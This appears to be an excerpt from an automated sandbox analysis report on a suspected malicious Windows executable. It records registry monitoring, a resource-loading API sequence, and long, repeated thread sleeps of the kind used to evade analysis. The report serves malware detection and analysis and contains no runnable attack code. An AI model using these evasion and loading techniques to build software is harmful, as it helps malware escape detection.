                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F8A816 push dword ptr [ecx+ecx-75h]; iretd 0_2_06F8A823
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMemory allocated: 2150000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMemory allocated: 21D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599118Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 599014Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598896Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598776Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598563Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 598016Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 597094Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596559Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596438Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596313Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596169Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595952Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeWindow / User API: threadDelayed 2097Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeWindow / User API: threadDelayed 7736Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7388Thread sleep count: 2097 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7388Thread sleep count: 7736 > 30Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599118s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -599014s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598896s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598776s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -598016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe TID: 7384Thread sleep time: -597797s >= -30000sJump to behavior
